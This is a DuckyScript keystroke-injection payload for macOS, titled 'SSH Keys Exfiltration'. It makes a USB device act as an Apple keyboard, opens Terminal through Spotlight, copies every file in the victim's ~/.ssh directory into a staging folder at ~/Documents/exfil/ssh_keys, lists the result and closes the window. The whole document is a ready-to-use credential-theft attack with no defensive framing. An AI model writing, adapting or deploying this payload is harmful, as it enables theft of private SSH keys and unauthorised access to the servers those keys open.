REM Author: Generated
REM Title: SSH Keys Exfiltration
REM Target: macOS
REM Version: 1.0
REM Category: Credentials
REM ---
DELAY 1000
REM Copy SSH keys from ~/.ssh directory
REM Saves to ~/Documents/exfil/ssh_keys/
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil/ssh_keys
ENTER
DELAY 500
STRING cp -r ~/.ssh/* ~/Documents/exfil/ssh_keys/ 2>/dev/null || echo 'No SSH keys found' > ~/Documents/exfil/ssh_keys/status.txt
ENTER
DELAY 500
STRING ls -la ~/Documents/exfil/ssh_keys/
ENTER
DELAY 1000
GUI w
